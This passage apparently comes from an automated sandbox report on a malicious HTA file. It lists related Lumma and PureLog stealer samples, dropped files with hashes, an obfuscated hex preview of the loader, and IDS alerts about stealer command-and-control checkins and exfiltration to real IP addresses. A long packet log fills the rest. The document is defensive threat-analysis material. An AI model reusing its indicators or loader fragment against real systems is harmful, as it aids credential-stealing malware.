                                                                                          aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.194.161
                                                                                          Updater.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.194.161
                                                                                          a0e9f5d64349fb13191bc781f81f42e1EZsrFTi.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                          • 172.67.212.45
                                                                                          • 104.21.64.1
                                                                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.212.45
                                                                                          • 104.21.64.1
                                                                                          L#U043e#U0430d#U0435r.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.212.45
                                                                                          • 104.21.64.1
                                                                                          Xeno.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                          • 172.67.212.45
                                                                                          • 104.21.64.1
                                                                                          Adobe-Acrobat-Pro-2025.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                          • 172.67.212.45
                                                                                          • 104.21.64.1
                                                                                          MotivatedFunded.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.212.45
                                                                                          • 104.21.64.1
                                                                                          Set-Up.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.212.45
                                                                                          • 104.21.64.1
                                                                                          ActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.212.45
                                                                                          • 104.21.64.1

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):5829
                                                                                          Entropy (8bit):4.901113710259376
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                          MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                          SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                          SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                          SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1300
                                                                                          Entropy (8bit):5.400569405710951
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:3qBWSKco4KmM6GjKbmOIl+mN1s4RPQoU99t7J0gt/NK3R8QHrG+:AWSU4Yym/+ms4RIoU99tK8NWR8QHn
                                                                                          MD5:D2B9122AE81DE03415A6783586C1BFB1
                                                                                          SHA1:309AAE457EE9C1AE985683AC4D765E3F6DDA7ECE
                                                                                          SHA-256:A96A4340A12DDC543D08A7BB94DBA3D2EDB0858E3C26772B311FE26738E38331
                                                                                          SHA-512:CC9470D9F6684955547E6183EBB7260E4392050004700E0205425A410C58479759F8BE8F84559BB3C107BD065DF8F9426E91F628F343E2987D4039F961D303BA
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                          C:\Users\user\AppData\Local\Temp\UAGVQ199I7H3ZT4G1PSFXCX6W.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (986)
                                                                                          Category:dropped
                                                                                          Size (bytes):16791
                                                                                          Entropy (8bit):4.431180163596247
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:xSD+TD90sp7aSVbJ/CtzfWdYdKG7VhN3EpIJ5tFtQjMY5VhIJ+Ik:7azfVZ3LPQD6J7k
                                                                                          MD5:2E59DF53309DBD234F876BAD5C73F5B4
                                                                                          SHA1:BB243841CEA5D85A0E2849C949B9BB11CEB4FC33
                                                                                          SHA-256:B73DF91C83960A7DCCE8F112B1F7E4DB8EC6B659D4AC706F79A1A703297533DD
                                                                                          SHA-512:34C966EC7213CA502849BAC1BB6B18A3C4B30EC07EB8FFAA837D048ED853C15842256C6C2869F96ADBA2EB9994A85393CED0CEDC72B9A9DA8E08BB019FBB3E5A
                                                                                          Malicious:false
                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Forbidden</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. h1 {. font-size: 3.75rem;. font-weight: 400;. margin-bottom: 0.5rem;. }. h3 {.

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfcwwmgq.gat.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gscs4evv.rkw.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyfx1lwm.1uo.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlyzcixi.zsd.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:ASCII text, with very long lines (65536), with no line terminators
                                                                                          Entropy (8bit):5.301485616023739
                                                                                          TrID:
                                                                                            File name:new-riii-1-b.pub.hta
                                                                                            File size:643'313 bytes
                                                                                            MD5:43dd09be1f034e3f7f6232bc7e1d3b80
                                                                                            SHA1:bf085f00fd0a9cf51e0a580d9819367e345cace4
                                                                                            SHA256:3d1a4b9e37868f54e7e7eb98aae0203e2c50b2977170e0006cd3cbcb071c6b94
                                                                                            SHA512:562abb49124d9f87faca60c0568a9846839866e0a0d23c7facd6e003de6fc03f4aceaca8f0c327e6dd0827c4d1eb9a214b593a58fbca5b343b24cb1414d989b9
                                                                                            SSDEEP:6144:3L+/jwnm2CVkpjY2mAIzg53cb3JQQkzxGLOaJQQszxGkJxQkzxGQ7sJGQkzMGFBQ:3L+/jCm2CVkpzmAIze3cbnK8yyKkKEKy
                                                                                            TLSH:49D4925A9B7BD514C4B63D7CF8C503A134A46CCD9489C6C90AFEAC2524870ECBE989FC
                                                                                            File Content Preview:66V75s6eQ63z74r69Q6fA6eY20v6fp48H55w4fD47n57j28o51E4bT6aC4dk53t29i7bn76m61x72D20c73V61b49o46S79y7aO3dU20X27h27r3bF66H6fj72t20G28w76d61i72Y20N74X65z73X54O71i55O20H3dI20n30F3be74C65o73o54f71w55H20X3cJ20h51i4bQ6aC4dx53y2eM6cS65r6em67m74K68D3bZ20q74F65V73E54Z

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-01-15T18:25:37.924897+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657621104.21.64.1443TCP
                                                                                            2025-01-15T18:25:38.391221+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.657621104.21.64.1443TCP
                                                                                            2025-01-15T18:25:38.391221+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.657621104.21.64.1443TCP
                                                                                            2025-01-15T18:25:38.896128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657628104.21.64.1443TCP
                                                                                            2025-01-15T18:25:39.411857+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.657628104.21.64.1443TCP
                                                                                            2025-01-15T18:25:39.411857+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.657628104.21.64.1443TCP
                                                                                            2025-01-15T18:25:40.048427+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657635104.21.64.1443TCP
                                                                                            2025-01-15T18:25:40.793143+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.657635104.21.64.1443TCP
                                                                                            2025-01-15T18:25:41.286889+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657644104.21.64.1443TCP
                                                                                            2025-01-15T18:25:42.637956+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657654104.21.64.1443TCP
                                                                                            2025-01-15T18:25:44.015585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657662104.21.64.1443TCP
                                                                                            2025-01-15T18:25:45.850746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657675104.21.64.1443TCP
                                                                                            2025-01-15T18:25:49.199005+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657694104.21.64.1443TCP
                                                                                            2025-01-15T18:25:49.687177+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.657694104.21.64.1443TCP
                                                                                            2025-01-15T18:25:50.205910+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.657702172.67.212.45443TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 15, 2025 18:25:07.413986921 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:07.414011955 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:07.414098024 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:07.422597885 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:07.422616005 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:07.929687023 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:07.930381060 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:07.931309938 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:07.931322098 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:07.931525946 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:07.947863102 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:07.991369963 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396261930 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396318913 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396347046 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396399975 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396434069 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.396450043 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396512032 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.396518946 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396574020 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396600008 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.396606922 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396647930 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.396680117 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.396687984 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.397717953 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.517199993 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.517326117 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.517467976 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.517483950 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.517700911 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.517735004 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.517764091 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.517795086 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.517803907 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.517833948 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.547955990 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.547983885 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.548052073 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.548089027 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.548103094 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.548152924 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.548284054 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.548326015 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.548347950 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.548419952 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.548430920 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.548441887 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.562361956 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.562391043 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.562441111 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.562479019 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.562493086 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.562555075 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.614176989 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.621028900 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.621220112 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.621258020 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.621284008 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.621318102 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.621329069 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.621367931 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.632534027 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.632754087 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.632762909 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.636578083 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.636636019 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.636645079 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.643260002 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.643323898 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.643332005 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.643343925 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.643388033 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.643393993 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.662972927 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.663044930 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.663054943 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.663091898 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.666856050 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.666944981 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.666994095 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.667001963 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.670805931 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.670865059 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.670872927 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.677129984 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.677184105 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.677191973 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.683804989 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.683866978 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.683878899 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.694458961 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.694520950 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.694531918 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.707518101 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.707528114 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.707592964 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.707604885 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.711738110 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.711822987 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.711832047 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.711877108 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.726764917 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.726834059 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.727112055 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.727169037 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.727185011 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.727230072 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.736455917 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.736521006 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.737581015 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.737643957 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.740437984 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.740493059 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.743843079 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.743895054 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.752141953 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.752216101 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.753742933 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.753791094 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.754506111 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.754550934 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.762207985 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.762283087 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.768297911 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.768450975 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.768531084 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.768539906 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.768587112 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.770421028 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.770966053 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.771019936 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.771027088 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.774738073 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.774804115 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.774816990 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.778431892 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.778517962 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.778527021 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.782058954 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.782128096 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.782135963 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.796190977 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.796273947 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.796283007 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.796325922 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.796628952 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.796689034 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.796713114 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.796758890 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.799784899 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.799854040 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.803200006 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.803275108 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.806420088 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.806484938 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.812382936 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.812448025 CET49715443192.168.2.6172.67.194.161
                                                                                            Jan 15, 2025 18:25:08.814699888 CET44349715172.67.194.161192.168.2.6
                                                                                            Jan 15, 2025 18:25:08.814773083 CET49715443192.168.2.6172.67.194.161
